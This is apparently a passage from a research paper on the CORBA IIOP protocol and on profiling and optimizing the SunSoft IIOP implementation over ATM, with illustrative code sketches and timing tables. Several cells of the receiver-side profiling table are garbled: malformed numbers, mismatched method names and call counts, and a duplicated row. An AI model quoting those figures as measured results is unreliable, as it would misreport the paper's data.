This paper is organized as follows. Section 2 outlines the CORBA reference model, the GIOP/IIOP interoperability protocols, and the SunSoft IIOP reference implementation; Section 3 presents the results of our performance optimizations of SunSoft IIOP over a high-speed ATM network; Section 4 compares our research with related work; and Section 5 provides concluding remarks.
2 Overview of CORBA, GIOP/IIOP, and the SunSoft IIOP Reference Implementation
CORBA ORBS allow clients to invoke methods on target object implementations without concern for where the object resides, what language the object is written in, what OS/hardware platform it runs on, or what communication protocols and networks are used to interconnect distributed objects. To support this level of transparency, the CORBA reference model defines the components in Figure 1. These components are defined as follows:
- **Object Implementation**: This defines operations that implement a CORBA interface definition language (IDL) interface.

- **Client**: This is the program entity that invokes an operation on a (potentially remote) object implementation.
- **Object Request Broker (ORB) core**: When a client invokes a method, the ORB core is responsible for delivering the request to the object and returning a response (if any) to the client. CORBA-conformant ORBs use the GIOP and IIOP interoperability protocols described in Section 2.1.
- **ORB Interface**: The ORB interface provides standard operations that allow an ORB to decouple applications from the implementation details of the ORB.
- **CORBA IDL Stubs and Skeletons**: CORBA IDL stubs and skeletons serve as the "glue" between the client and server applications, respectively, and the ORB.
- **Dynamic Invocation Interface (DII)**: The DII allows a client to directly access the underlying request mechanisms provided by an ORB. DII is used when the ORB has no compile-time knowledge of the interface it is implementing. To retrieve this information, it has to query the interface repository.
- **Dynamic Skeleton Interface (DSI)**: The DSI is the server side's analogue to the client side's DII. The DSI allows an ORB to deliver requests to an object implementation or ORB bridge that has no compile-time knowledge of the type of the object it is implementing.
- **Object Adapter**: The Object Adapter associates an object implementation with the ORB and demultiplexes incoming requests to the appropriate method of the target object.
2.1 Overview of CORBA GIOP and IIOP
The CORBA General Inter-ORB Protocol (GIOP) defines an interoperability protocol between heterogeneous ORBs. The GIOP protocol provides an abstract interface that can be mapped onto conventional connection-oriented transport protocols. A concrete mapping of GIOP onto the TCP/IP transport protocol is known as the Internet Inter-ORB Protocol (IIOP). An ORB supports GIOP if some entity associated with the
ORB is able to send and receive GIOP messages. The GIOP specification consists of the following elements:
- **Common Data Representation (CDR) definition:** The GIOP specification defines a transfer syntax called CDR. CDR maps OMG IDL types from the native host format to a bi-canonical representation that supports both little-endian and big-endian formats. CDR encoded messages are used to transmit CORBA requests and server responses across a network. All the OMG IDL data types are marshaled using the CDR syntax into an encapsulation. An encapsulation is an octet stream used to hold marshaled data.
- **GIOP Message Formats:** The GIOP specification defines seven types of messages that send requests, receive replies, locate objects, and manage communication channels;
- **GIOP Transport Assumptions:** The GIOP specification describes the assumptions made regarding transport protocols that can be used to carry GIOP messages. In addition, the GIOP specification defines a connection management protocol and a set of constraints for message ordering.
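The bi-canonical, "receiver-makes-right" convention of CDR can be sketched as follows. This is an illustrative Python fragment, not the actual OMG-specified encoding: alignment rules are omitted, and real GIOP carries the byte-order flag in the message header rather than next to each value:

```python
import struct

def encode_long(value, little_endian=True):
    """Encode a CORBA long (32 bits) CDR-style: a one-byte byte-order
    flag (0 = big-endian, 1 = little-endian) followed by the value in
    the sender's native order -- the sender never byte-swaps."""
    fmt = "<l" if little_endian else ">l"
    return bytes([1 if little_endian else 0]) + struct.pack(fmt, value)

def decode_long(buf):
    """Receiver-makes-right: honor whichever byte order the sender used,
    swapping only when the sender's order differs from the receiver's."""
    fmt = "<l" if buf[0] == 1 else ">l"
    return struct.unpack(fmt, buf[1:5])[0]
```

The design choice here is that byte swapping happens at most once, on the receiving side, and only when the two hosts actually disagree on endianness.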
The GIOP and IIOP specifications are described further in Appendix A. The remainder of this section presents an overview of the SunSoft IIOP reference implementation and describes the primary components of its implementation.
## 2.2 Overview of the SunSoft IIOP Implementation
### 2.2.1 CORBA Features Supported by SunSoft IIOP
The SunSoft IIOP implementation is widely regarded as the reference implementation of IIOP. It is freely available from `ftp://ftp.omg.org/pub/interop/`. SunSoft IIOP is written in C++ and provides most of the features of a CORBA 2.0 ORB, except for an IDL compiler, an interface repository, and a Basic Object Adapter. Therefore, users must provide stubs and skeletons that integrate with the APIs provided by SunSoft IIOP.
On the client-side, SunSoft IIOP provides a static invocation interface (SII) and a dynamic invocation interface (DII). The SII is used by the client-side stubs and server-side skeletons generated manually or by an IDL compiler. The DII is used by applications that have no compile-time knowledge of the interface they are calling. Thus, the DII allows applications to create CORBA requests at run-time. It marshals parameters by using interfaces containing methods of CORBA pseudo-object classes and by consulting the interface repository. Since SunSoft IIOP does not provide an IDL compiler, client stubs using the SII API must be hand-crafted.
On the server-side, SunSoft IIOP supports the dynamic skeleton interface (DSI). The DSI is used by applications (such as ORB bridges [15]) that have no compile-time knowledge of the interfaces they implement. The SunSoft IIOP does not provide an interface repository or an IDL compiler that can generate skeletons. Therefore, it uses the DSI mechanism to parse incoming requests, unmarshal the parameters, and demultiplex the request to the appropriate object implementation. Servers that use the SunSoft DSI mechanism must provide it with `TypeCode`² information that it uses to interpret incoming requests and demarshal the parameters.
### 2.2.2 SunSoft IIOP Components
The SunSoft IIOP implementation is based on an interpretive marshaling/demarshaling engine. The motivation for using an interpretive design is to reduce the size of the marshaling/demarshaling engine so that it resides within a processor cache. An alternative approach is to use a compiled marshaling/demarshaling engine [11]. A compiled approach is possible when the marshaling/demarshaling engine has compile-time knowledge of the structural layout of IDL interfaces and operation parameters.
The primary components in the SunSoft IIOP implementation are shown in Figure 2. Each component is described below:
- **The `TypeCode::traverse` method:** The `traverse` method of the `CORBA::TypeCode` class implements an IIOP `TypeCode` interpreter. All marshaling and demarshaling of parameters is performed interpretively by traversing the data structure according to the layout of the `TypeCode`/request tuple provided to `traverse`. This method is passed a pointer to a `visit` method (described below), which interprets CORBA requests based on their TypeCode layout. The request part of the tuple contains the data that was received from an application (i.e., on the client-side) or from the protocol stack (i.e., on the server-side).

1. CORBA pseudo-objects are entities that are neither CORBA primitive types nor constructed types. Operations on pseudo-object references cannot be invoked using the DII mechanism since the interface repository does not keep any information about them. In addition, only some pseudo-objects (such as `TypeCode` and `Any`) can be transferred as parameters to methods of an interface.
2. `TypeCodes` are CORBA pseudo-objects that describe the format and layout of primitive and constructed IDL data types in the incoming request stream.
- **The visit method**: The TypeCode interpreter invokes the `visit` method to marshal or demarshal the data associated with the TypeCode it is currently interpreting. The `visit` method is a pointer that holds the address of one of the four methods described below:
- **The CDR::encoder method** – The encoder method of the CDR class encodes various data types from their native host representation to the CDR representation used to transmit CORBA requests over the network.
- **The CDR::decoder method** – The decoder method of the CDR class retrieves request values in the native host representation from the incoming CDR stream.
- **The deep_copy method** – The deep_copy method is used by the SunSoft DII mechanism to create requests and marshal parameters into the CDR stream using the TypeCode interpreter.
- **The deep_free method** – The deep_free method is used by the DSI server to free allocated memory after incoming data has been demarshaled and passed to a server application.
- **The utility methods**: SunSoft IIOP provides several methods that perform various utility tasks. The two most important utility methods include:
- **The calc_nested_size_and_alignment method** – This method calculates the size and alignment of various fields that comprise an IDL struct.
- **The struct_traverse method** – This method is used by the TypeCode interpreter to traverse the fields in an IDL struct.
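The traverse/visit structure described above can be sketched as a small interpretive marshaler. The type-descriptor tuples and function names below are illustrative simplifications, not SunSoft IIOP's actual data structures:

```python
import struct

# Simplified type descriptors (illustrative, not SunSoft's TypeCode layout):
#   ("long",)              -- 32-bit integer
#   ("double",)            -- 64-bit float
#   ("struct", [tc, ...])  -- fields in declaration order
#   ("sequence", elem_tc)  -- length-prefixed, homogeneous elements

def traverse(tc, value, visit):
    """Walk a value according to its type descriptor, calling `visit` on
    each primitive -- the interpreter has no compile-time knowledge of
    the data layout, mirroring the interpretive design described above."""
    kind = tc[0]
    if kind in ("long", "double"):
        visit(kind, value)
    elif kind == "struct":
        for field_tc, field_val in zip(tc[1], value):
            traverse(field_tc, field_val, visit)
    elif kind == "sequence":
        visit("long", len(value))            # sequences carry a length prefix
        for elem in value:
            traverse(tc[1], elem, visit)

def encoder(out):
    """Build a `visit` callback that marshals primitives into a big-endian
    CDR-like stream (alignment padding omitted for brevity)."""
    fmts = {"long": ">l", "double": ">d"}
    return lambda kind, v: out.append(struct.pack(fmts[kind], v))

# A two-element sequence of a BinStruct-like {long; double} struct:
bin_struct_tc = ("struct", [("long",), ("double",)])
out = []
traverse(("sequence", bin_struct_tc), [(1, 2.0), (3, 4.0)], encoder(out))
stream = b"".join(out)
```

A decoder would be another `visit` callback walking the same descriptors, which is how one interpreter serves both marshaling and demarshaling.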
### 2.2.3 Tracing the Data Path of an IIOP Request
To illustrate the run-time behavior of SunSoft IIOP, we trace the path taken by requests that transmit a sequence of BinStructs (shown in Appendix B). We show how the TypeCode interpreter consults the TypeCode information as it marshals and unmarshals parameters. The same BinStruct is used in our experiments described in Section 3.2.
- **TypeCode Layout for BinStructs**: Figure 3 depicts the internal representation of TypeCode information that defines the sequence of BinStructs shown in Appendix B. The layout of the sequence of BinStructs and its parameters are described below:
- **TypeCode value** – A CORBA TypeCode data structure contains a `_kind` field that indicates the TCKind value, which is an enumerated type. In our “sequence of BinStruct” example, the TCKind value is `tk_sequence`.
- **TypeCode length and byte order** – The length field indicates the length of the buffer that holds the CDR representation of the TypeCode’s parameters. In this example, the first byte of the CDR buffer indicates the byte order. Here, the value 0 indicates that big-endian byte-ordering is used.
- **Element type** – For a sequence TypeCode, the next entry in the buffer is the TypeCode kind entry for the element type that makes up the sequence. In our example, this value is `tk_struct`.
- **Encapsulation length and sequence bound** – The next entry is a length field indicating the length of the encapsulation that holds information about the struct’s members. The length field is followed by the encapsulation, followed by a field that indicates the bounds of the sequence. A value of 0 indicates an “unbounded” sequence (i.e., the size of the sequence is determined at run-time, not at compile-time).
- **Encapsulation content and field layouts** – The encapsulation is made up of two string entries, which follow the designation of the encapsulation’s byte-order. Each string entry has a length field specifying the length of the string, followed by the string value. Following this field is a number indicating the number of members in the BinStruct IDL struct. This is followed by TypeCode layouts for each field in the struct.
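As a rough illustration of reading such a layout, the sketch below builds and then parses a simplified sequence TypeCode with the fields described above (kind, parameter length, byte-order flag, element kind, encapsulation length and contents, and bound). The packing and the `TCKind` constants are illustrative, not the exact OMG CDR encoding:

```python
import struct

TK_STRUCT, TK_SEQUENCE = 15, 19   # illustrative TCKind tags

def parse_sequence_typecode(buf):
    """Parse: kind (4) | param length (4) | byte-order flag (1) |
    element kind (4) | encapsulation length (4) | encapsulation | bound (4)."""
    kind, _param_len = struct.unpack_from(">ll", buf, 0)
    assert kind == TK_SEQUENCE
    byte_order = buf[8]                        # 0 = big-endian
    elem_kind, encap_len = struct.unpack_from(">ll", buf, 9)
    (bound,) = struct.unpack_from(">l", buf, 17 + encap_len)
    return {"elem_kind": elem_kind, "byte_order": byte_order,
            "bound": bound}                    # bound 0 => unbounded

encap = b"\x00" * 6                            # member info left opaque here
buf = (struct.pack(">ll", TK_SEQUENCE, 1 + 4 + 4 + len(encap) + 4)
       + b"\x00"                               # big-endian flag
       + struct.pack(">ll", TK_STRUCT, len(encap))
       + encap
       + struct.pack(">l", 0))                 # unbounded sequence
info = parse_sequence_typecode(buf)
```

The point of the exercise is that every nested field is self-describing: the parser needs only the buffer and the layout rules, exactly the situation the TypeCode interpreter faces at run-time.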
- **Client-side Data Path**: The client-side data path is shown in Figure 4. This figure depicts the path traced by requests through the TypeCode interpreter. The CDR::encoder method marshals the parameters from native host format into a CDR representation suitable for transmission on the network.
The client uses the do_call method, which is the SII API provided by SunSoft IIOP that uses the TypeCode interpreter to marshal the parameters and send the requests.
The do_call method creates a CDR stream into which the operation’s CORBA parameters are marshaled before they are sent over the network. To marshal the parameters, do_call uses the CDR::encoder visit method. For primitive types (such as octet, short, long, and double), the CDR::encoder method marshals them into the CDR stream using the low-level CDR::put methods. For constructed data types (such as IDL structs and sequences), the encoder invokes the TypeCode interpreter.
The traverse method of the TypeCode interpreter consults the TypeCode layout passed to it by an application to determine the data types that comprise a constructed data type. For each member of a constructed data type, the interpreter invokes the same visit method that invoked it. In our case, the encoder is the visit method that originally called the interpreter. This process continues recursively until all parameters have been marshaled. At this point the request is transmitted over the network via the GIOP::Invocation::invoke method.
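The recursive traverse/visit structure described above can be sketched in miniature. MiniTypeCode and the size-computing traverse below are illustrative stand-ins for the real interpreter, which dispatches on TCKind and recurses into each member of a constructed type:

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// Miniature of an interpretive engine: traverse() dispatches on a TCKind tag
// and recurses into each member of a constructed type, just as the text
// describes TypeCode::traverse re-invoking the visit method per member.
enum TCKind { tk_octet, tk_short, tk_long, tk_double, tk_struct };

struct MiniTypeCode {
    TCKind kind;
    std::vector<MiniTypeCode> members;  // used only when kind == tk_struct
};

// Returns the unaligned marshaled size of one value described by tc.
std::size_t traverse(const MiniTypeCode& tc) {
    switch (tc.kind) {
        case tk_octet:  return 1;
        case tk_short:  return 2;
        case tk_long:   return 4;
        case tk_double: return 8;
        case tk_struct: {
            std::size_t total = 0;
            for (const MiniTypeCode& m : tc.members)
                total += traverse(m);   // one recursive call per member
            return total;
        }
    }
    return 0;
}
```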
- **Server-side Data Path:** The server-side data path shown in Figure 5 depicts the path traced by requests through the TypeCode interpreter. The CDR::decoder method unmarshals the parameters from the CDR representation into the server’s native host format. An event handler (TCP_OA) waits for incoming data. After a CORBA request is received, its GIOP type is decoded. The server’s dispatching mechanism then dispatches the request to a skeleton via a user supplied upcall.
Since SunSoft IIOP does not provide a standard CORBA Object Adapter, the server programmer must write a tcp_oa_dispatch method that dispatches the request to the correct skeleton. The request demultiplexing and dispatching process can use any of a number of strategies to demultiplex requests to skeletons. These strategies include linear searching or hashing of operation names.
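One of the dispatching strategies mentioned, hashing of operation names, might look like the following sketch; the operation names and the Skeleton signature are invented for illustration:

```cpp
#include <cassert>
#include <functional>
#include <string>
#include <unordered_map>

// Hash-based request demultiplexing: map an operation name extracted from the
// GIOP request header to the skeleton that handles it.
using Skeleton = std::function<int()>;
using DispatchTable = std::unordered_map<std::string, Skeleton>;

// Returns the skeleton's result, or -1 for an unknown operation
// (a real ORB would raise a BAD_OPERATION exception instead).
int dispatch(const DispatchTable& table, const std::string& op) {
    auto it = table.find(op);   // O(1) expected, vs. O(n) linear search
    return it == table.end() ? -1 : it->second();
}
```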
The SunSoft receiver supports the DSI mechanism. Therefore, an NVList CORBA pseudo-object is created and populated with the TypeCode information for the parameters retrieved from the incoming request. These parameters are retrieved by calling the ServerRequest::params method. As with the client, the server’s TypeCode interpreter uses the CDR::decoder visit method to unmarshal individual data types into parameters that are subsequently passed to the server application’s upcall method.
3 Experimental Results of CORBA IIOP over ATM
3.1 CORBA/ATM Testbed Environment
3.1.1 Hardware and Software Platforms
The experiments in this section were conducted using a Bay Networks LattisCell 10114 ATM switch connected to two dual-processor UltraSPARC-2s running SunOS 5.5.1. The LattisCell 10114 is a 16-port, OC-3 (155 Mbps/port) switch. Each UltraSPARC-2 contains two 168 MHz UltraSPARC CPUs with a 1 Megabyte cache per CPU. The SunOS 5.5.1 TCP/IP protocol stack is implemented using the STREAMS communication framework [17]. Each UltraSPARC-2 has 256 Mbytes of RAM and an ENI-155s-MF ATM adapter card, which supports 155 Megabits per second (Mbps) SONET multimode fiber. The Maximum Transmission Unit (MTU) on the ENI ATM adapter is 9,180 bytes. Each ENI card has 512 Kbytes of on-board memory. A maximum of 32 Kbytes is allotted per ATM virtual circuit connection for receiving and transmitting frames (for a total of 64 Kbytes). This allows up to eight switched virtual connections per card. This hardware platform is shown in Figure 6.
3.1.2 Traffic Generator for Throughput Measurements
Traffic for the experiments was generated and consumed by an extended version of the widely available ttcp [20] protocol benchmarking tool. We extended ttcp for use with SunSoft IIOP. We hand-crafted the stubs and skeletons for the different methods defined in the interface. Our hand-crafted stubs use the SII API (the do_call method) provided by SunSoft IIOP. On the server-side, the Object Adapter uses a callback method (supplied by the ttcp server application) to dispatch incoming requests along with parameters to the target object.
Our ttcp tool measures end-to-end data transfer throughput in Mbps from a transmitter process to a remote receiver process across an ATM network. The flow of user data for each version of ttcp is unidirectional, with the transmitter flooding the receiver with a user-specified number of data buffers. Various sender and receiver parameters may be selected at run-time. These parameters include the number of
data buffers transmitted, the size of data buffers, and the type of data in the buffers. In all our experiments the underlying socket queue sizes were enlarged to 64 Kbytes (which is the maximum supported on SunOS 5.5.1).
The following data types were used for all the tests: primitive types (short, char, long, octet, double) and a C++ struct composed of all the primitives (BinStruct). The size of the BinStruct is 32 bytes. The IIOP implementation transferred the data types using IDL sequences, which are dynamically-sized arrays. The IDL declaration is shown in the appendix. The sender side transmitted data buffer sizes of a specific data type incremented in powers of two, ranging from 1 Kbyte to 128 Kbytes. These buffers were repeatedly sent until a total of 64 Mbytes of data was transmitted.
3.1.3 Profiling Tools
The profile information for the empirical analysis was obtained using the Quantify [19] performance measurement tool. Quantify analyzes performance bottlenecks and identifies sections of code that dominate execution time. Unlike traditional sampling-based profilers (such as the UNIX gprof tool), Quantify reports results without including its own overhead. In addition, Quantify measures the overhead of system calls and third-party libraries without requiring access to source code. All data is recorded in terms of machine instruction cycles and converted to elapsed times according to the clock rate of the machine. The collected data reflect the cost of the original program's instructions and automatically exclude any Quantify counting overhead.
Additional information on the run-time behavior of the code such as system calls made, their return values, signals, number of bytes written to the network interface, and number of bytes read from the network interface are obtained using the UNIX truss utility, which traces the system calls made by an application. truss is used to observe the return values of system calls such as write and read. This indicates the number of attempts made to write a buffer to a network and read a buffer from the network.
3.2 Performance Results and Optimization Benefits
3.2.1 Methodology
This section describes the optimizations we applied to SunSoft IIOP to improve its throughput performance over ATM networks. First, we show the performance of the original SunSoft IIOP for a range of IDL data types. Next, we use Quantify to illustrate the key sources of overhead in SunSoft IIOP. Finally, we describe the benefits of the optimization principles we applied to improve the performance of SunSoft IIOP.
The optimizations described in this section are based on principles for efficiently implementing protocols. [21] describes these principles in detail and describes how they are applied in existing protocol implementations, e.g., TCP/IP. We focus on the principles in Table 1 that improve IIOP performance. When describing our optimizations, we refer to these principles and explain how their use is justified.
The SunSoft IIOP optimizations were performed in the following four steps, corresponding to the principles from Table 1:
1. Inlining to optimize for the expected case – which is discussed in Section 3.2.3;
2. Aggressive inlining to optimize for the expected case – which is discussed in Section 3.2.4;
3. Precomputing, adding redundant state, and passing information through layers – which is discussed in Section 3.2.5;
4. Eliminating obvious waste and specializing generic methods – which is discussed in Section 3.2.6.
For each step, we describe the optimizations we applied to reduce the overhead remaining from the previous steps. After each step, we show the improved throughput measurements for various data types. In addition, we compare the throughput obtained in the previous steps with that obtained in the current step. The comparisons focus on data types that exhibited the widest range of performance. The first two optimization steps shown below do not significantly improve performance. However, these steps are important since they reveal the actual sources of overhead that are alleviated by the optimizations in steps three and four reported below.
3.2.2 Performance of the Original IIOP Implementation
- **Sender-side performance:** Figure 7 illustrates the sender-side throughput obtained for sending 64 Mbytes of various data types for sender buffer sizes ranging from 1 Kbyte to 128 Kbytes, incremented in powers of two. These results indicate that different data types achieved different levels of throughput. The highest throughput results from sending doubles, whereas BinStructs displayed the worst behavior. This variation in behavior stems from the marshaling and demarshaling overhead for different data types, as well as from the use of the interpretive marshaling/demarshaling engine in SunSoft IIOP that results in a large number of recursive method calls.
Tables 2 and 3 present the results of using the Quantify profiling tool to send 64 Mbytes of various data types using a 128 Kbyte sender buffer. The sender-side results reveal that for all data types, the sender spends most of its run-time performing write system calls to the network. In addition, the table reveals that BinStructs took the most amount of time to send, whereas doubles took the least.
- **Receiver-side performance:** The receiver-side results\(^3\) for sending primitive data types indicate that most of the run-time costs are incurred by (1) the TypeCode interpreter (TypeCode::traverse), (2) the CDR methods that retrieve the value from the incoming data (e.g., get_long and get_short), (3) the method deep_free that deallocates memory, and (4) the CDR::decoder method. For BinStructs, the receiver spends a significant amount of time traversing the BinStruct TypeCode (struct_traverse) and calculating the size and alignment of each member in the struct.
The receiver's run-time costs affect the sender adversely by increasing the time required to perform write system calls to the network. This happens due to the transport protocol flow control enforced by the receiving side, which cannot keep pace with the sender due to the excessive presentation layer overhead.
The remainder of this section describes the various optimizations we incorporated into the original IIOP implementation, as well as the motivations for applying them. After applying the optimizations, we examine the new throughput measurements for sending different data types. In addition, we show how our optimizations affect the performance of the best case (doubles) and the worst case (BinStruct). Likewise, detailed profiling results from Quantify are provided only for the best and worst cases.
\[^3\]Throughput measurements from the receiver-side were nearly identical to the sender measurements and are not presented here.

Tables 2 and 3 illustrate that the receiver is the principal performance bottleneck. Therefore, our optimizations are designed to improve receiver performance, and we show profile measurements only for the receiver.
3.2.3 Optimization Step 1: Inlining to Optimize for the Expected Case
- **Problem: invocation overhead for small, frequently called methods:** This subsection describes an optimization to improve the performance of IIOP receivers. We applied Principle 1 from Table 1, which optimizes for the expected case. Table 3 illustrates that, depending on the data type, the appropriate get method of the CDR class must be invoked to retrieve the data from the incoming stream into a local copy. Since the get methods are always invoked, they are prime targets for our first optimization step.
- **Solution:** inline method calls: Our solution to reduce invocation overhead for small, frequently called methods was to designate these methods as inline, using C++ language features. The throughput measurements after inlining the get methods are shown in Figure 8. Figures 9 and 10 illustrate the effect of inlining on the throughput of doubles and BinStructs. Figures 9 and 10 also compare the new results with the original results.
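A minimal sketch of why the get methods benefit from inlining: each one only copies a few bytes and advances a cursor, so call/return overhead can rival the useful work. MiniCDR is our illustrative class, not the SunSoft CDR; byte-swapping and alignment are omitted:

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Sketch of small, frequently called CDR get methods. Each call just copies
// a few bytes and bumps a cursor, so they are natural inlining candidates.
class MiniCDR {
public:
    explicit MiniCDR(const unsigned char* buf) : next_(buf) {}

    // Declared inline so the compiler can expand the copy at each call site.
    inline std::int32_t get_long() {
        std::int32_t v;
        std::memcpy(&v, next_, sizeof v);  // assumes sender byte order == host
        next_ += sizeof v;
        return v;
    }
    inline std::int16_t get_short() {
        std::int16_t v;
        std::memcpy(&v, next_, sizeof v);
        next_ += sizeof v;
        return v;
    }
private:
    const unsigned char* next_;  // read cursor into the incoming CDR buffer
};
```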
- **Optimization results:** After inlining, the new throughput results indicate only a marginal (i.e., 3-4%) increase in performance. Tables 4 and 5 show profiling measurements for the sender and receiver, respectively.
Table 2: Sender-side Overhead in the Original IIOP Implementation
<table>
<thead>
<tr>
<th>Data Type</th>
<th>Method Name</th>
<th>msec</th>
<th>Called</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr>
<td>double</td>
<td>write</td>
<td>78,051</td>
<td>512</td>
<td>93.33</td>
</tr>
<tr>
<td></td>
<td>put_longlong</td>
<td>2,250</td>
<td>8,388,608</td>
<td>2.99</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>1,605</td>
<td>8,388,016</td>
<td>1.92</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>1,000</td>
<td>1,024</td>
<td>1.55</td>
</tr>
<tr>
<td>long</td>
<td>write</td>
<td>134,141</td>
<td>512</td>
<td>92.92</td>
</tr>
<tr>
<td></td>
<td>put_long</td>
<td>3,799</td>
<td>16,780,238</td>
<td>2.63</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>3,103</td>
<td>16,781,284</td>
<td>2.47</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>2,998</td>
<td>1,024</td>
<td>1.80</td>
</tr>
<tr>
<td>short</td>
<td>write</td>
<td>265,392</td>
<td>512</td>
<td>93.02</td>
</tr>
<tr>
<td></td>
<td>put_short</td>
<td>7,993</td>
<td>33,554,432</td>
<td>2.66</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>6,598</td>
<td>33,559,040</td>
<td>2.31</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>5,195</td>
<td>1,024</td>
<td>1.82</td>
</tr>
<tr>
<td>octet</td>
<td>write</td>
<td>530,134</td>
<td>512</td>
<td>93.43</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>15,986</td>
<td>67,113,472</td>
<td>2.82</td>
</tr>
<tr>
<td></td>
<td>cdr::byte</td>
<td>10,291</td>
<td>67,118,000</td>
<td>1.83</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>10,388</td>
<td>1,024</td>
<td>1.83</td>
</tr>
<tr>
<td>BinStruct</td>
<td>write</td>
<td>588,039</td>
<td>512</td>
<td>88.65</td>
</tr>
<tr>
<td></td>
<td>get_long</td>
<td>19,846</td>
<td>44,083,504</td>
<td>2.99</td>
</tr>
<tr>
<td></td>
<td>calc_nested_size...</td>
<td>11,499</td>
<td>14,683,648</td>
<td>1.73</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>10,394</td>
<td>31,461,888</td>
<td>1.57</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>8,803</td>
<td>4,195,328</td>
<td>1.33</td>
</tr>
</tbody>
</table>
Table 3: Receiver-side Overhead in the Original IIOP Implementation
<table>
<thead>
<tr>
<th>Data Type</th>
<th>Method Name</th>
<th>msec</th>
<th>Called</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr>
<td>double</td>
<td>TypeCode::traverse</td>
<td>2,598</td>
<td>1,539</td>
<td>23.88</td>
</tr>
<tr>
<td></td>
<td>cdr::get_longlong</td>
<td>2,596</td>
<td>8,388,608</td>
<td>23.80</td>
</tr>
<tr>
<td></td>
<td>deep_free</td>
<td>1,645</td>
<td>8,388,608</td>
<td>15.10</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>1,551</td>
<td>8,395,797</td>
<td>14.21</td>
</tr>
<tr>
<td></td>
<td>read</td>
<td>1,146</td>
<td>1,866</td>
<td>10.51</td>
</tr>
<tr>
<td>long</td>
<td>TypeCode::kind</td>
<td>799</td>
<td>8,389,120</td>
<td>7.31</td>
</tr>
<tr>
<td></td>
<td>cdr::get_longlong</td>
<td>5,194</td>
<td>1,539</td>
<td>25.31</td>
</tr>
<tr>
<td></td>
<td>cdr::get_PTT</td>
<td>4,956</td>
<td>16,783,379</td>
<td>22.40</td>
</tr>
<tr>
<td></td>
<td>deep_free</td>
<td>3,295</td>
<td>16,784,241</td>
<td>16.06</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>3,099</td>
<td>16,784,405</td>
<td>15.10</td>
</tr>
<tr>
<td></td>
<td>read</td>
<td>1,682</td>
<td>2,274</td>
<td>8.40</td>
</tr>
<tr>
<td>short</td>
<td>TypeCode::traverse</td>
<td>1,598</td>
<td>16,777,728</td>
<td>7.79</td>
</tr>
<tr>
<td></td>
<td>cdr::get_short</td>
<td>10,387</td>
<td>1,539</td>
<td>27.22</td>
</tr>
<tr>
<td></td>
<td>deep_free</td>
<td>9,188</td>
<td>33,554,432</td>
<td>24.07</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>9,194</td>
<td>33,559,615</td>
<td>17.27</td>
</tr>
<tr>
<td></td>
<td>TypeCode::kind</td>
<td>3,196</td>
<td>33,554,944</td>
<td>8.37</td>
</tr>
<tr>
<td>octet</td>
<td>TypeCode::traverse</td>
<td>20,773</td>
<td>1,539</td>
<td>29.30</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>13,984</td>
<td>67,118,003</td>
<td>19.71</td>
</tr>
<tr>
<td></td>
<td>deep_free</td>
<td>13,182</td>
<td>67,109,889</td>
<td>18.59</td>
</tr>
<tr>
<td></td>
<td>cdr::get_byte</td>
<td>10,787</td>
<td>67,118,113</td>
<td>15.22</td>
</tr>
<tr>
<td></td>
<td>TypeCode::kind</td>
<td>6,391</td>
<td>67,109,376</td>
<td>9.02</td>
</tr>
<tr>
<td>BinStruct</td>
<td>get_long</td>
<td>35,021,118</td>
<td>85,921,421</td>
<td>27.65</td>
</tr>
<tr>
<td></td>
<td>struct_traverse</td>
<td>23,041,20</td>
<td>29,270,880</td>
<td>18.31</td>
</tr>
<tr>
<td></td>
<td>calc_nested_size...</td>
<td>15,154,42</td>
<td>4,199,304</td>
<td>11.94</td>
</tr>
<tr>
<td></td>
<td>struct_traverse</td>
<td>10,406,70</td>
<td>33,561,621</td>
<td>8.21</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>10,401</td>
<td>6,092,995</td>
<td>8.20</td>
</tr>
<tr>
<td></td>
<td>deep_free</td>
<td>6,492</td>
<td>14,681,080</td>
<td>5.11</td>
</tr>
<tr>
<td></td>
<td>cdr::get_byte</td>
<td>6,394</td>
<td>33,566,720</td>
<td>5.94</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>3,399</td>
<td>21,153,513</td>
<td>2.88</td>
</tr>
</tbody>
</table>
Table 4: Sender-side Overhead After Applying the First Optimization (inlining)
<table>
<thead>
<tr>
<th>Data Type</th>
<th>Method Name</th>
<th>msec</th>
<th>Called</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr>
<td>double</td>
<td>write</td>
<td>86,190</td>
<td>512</td>
<td>93.08</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>2,254</td>
<td>8,383,216</td>
<td>3.78</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>1,000</td>
<td>1,024</td>
<td>1.51</td>
</tr>
<tr>
<td>BinStruct</td>
<td>write</td>
<td>436,694</td>
<td>512</td>
<td>85.00</td>
</tr>
<tr>
<td></td>
<td>calc_nested_size...</td>
<td>13,195</td>
<td>14,683,648</td>
<td>2.90</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>14,213</td>
<td>31,461,888</td>
<td>2.77</td>
</tr>
</tbody>
</table>
3.2.4 Optimization Step 2: Aggressive Inlining to Optimize for the Expected Case
- Problem: lack of C++ compiler support for aggressive inlining: The second optimization step continues with Principle 1 (optimizing for the expected case). Our Quantify results in Section 3.2.3 reveal that supplying the inline keyword to the compiler does not always work since the compiler occasionally ignores this "hint." Likewise, Table 5 reveals that inlining some methods may "uninline" others.
